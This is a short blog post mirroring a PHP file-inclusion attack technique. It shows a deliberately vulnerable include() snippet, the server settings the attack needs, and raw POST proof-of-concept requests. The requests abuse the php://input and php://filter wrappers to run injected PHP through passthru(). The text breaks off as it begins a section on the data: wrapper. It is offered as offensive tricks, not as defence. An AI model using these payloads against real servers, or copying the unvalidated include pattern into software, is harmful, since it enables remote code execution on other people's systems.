Posts

Showing posts from March, 2011

Self Contained RFI in PHP

This is a direct rip from here : http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html It is for my own record, and can be seen as a mirror. :)

Sometimes those two tricks may be useful in RFI attacks.

1. Using php://input wrapper

php://input wrapper allows you to read raw POST data (http://ru2.php.net/wrappers.php).

For example, there is such code: sini2


<?
if ( include($_GET['file'] . '.php') ) {
echo 'Henck!'; } else {
echo 'Error!'; }
?>

For exploitation we need:

allow_url_include=On
magic_quotes_gpc=Off

PoC:

POST http://site.com/index.php?file=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>


Also using additional php://filter wrapper (available since PHP 5.0.0) we can encode our php code:

POST http://site.com/index.php?file=php://filter/read=string.rot13/resource=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>


2. Using data: wrapper

Since version 5.2.0 PHP supports "data" …